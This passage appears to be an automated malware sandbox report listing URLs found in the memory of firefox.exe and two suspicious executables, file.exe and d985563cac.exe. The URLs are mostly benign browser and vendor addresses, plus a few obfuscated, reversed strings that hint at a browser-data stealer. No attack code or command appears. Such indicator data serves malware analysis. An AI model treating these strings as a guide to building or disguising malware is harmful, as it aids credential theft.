Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000021.00000003.2891342640.00000273AB1E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: d985563cac.exe, 00000010.00000003.2665014822.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779364795.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2881402158.0000000005CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000021.00000003.2891656472.00000273AA041000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2973921454.00000273AA041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A5143000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000021.00000003.2901737890.00000273AA1A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2937922640.00000273AA1A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2012687521.000000000B85C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1870992566.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688949634.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2665014822.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2665215792.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688803443.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2806521520.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779364795.0000000005C60000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779746551.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2806875011.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2881402158.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2908417230.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2882219675.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2905581304.0000000005C57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: d985563cac.exe, 00000010.00000003.2665215792.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779746551.0000000005C34000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2882219675.0000000005C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1870992566.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688949634.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2665014822.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2665215792.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688803443.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2806521520.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779364795.0000000005C60000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779746551.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2806875011.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2881402158.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2908417230.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2882219675.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2905581304.0000000005C57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: d985563cac.exe, 00000010.00000003.2665215792.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779746551.0000000005C34000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2882219675.0000000005C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000021.00000003.2904150140.00000273A8A23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000021.00000003.2977075827.00000273A9B8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3171312999.00000273A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000021.00000002.3097416157.00000273A5143000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/templateContent
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000021.00000003.2902228631.00000273A8845000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2904390569.00000273A8A0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 00000021.00000003.2972232605.00000273AAEDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2980646819.00000273A921A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchLOAD_DOCUMENT_NEEDS_COOKIEINHIBIT_PERSISTENT_CACHINGquery=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
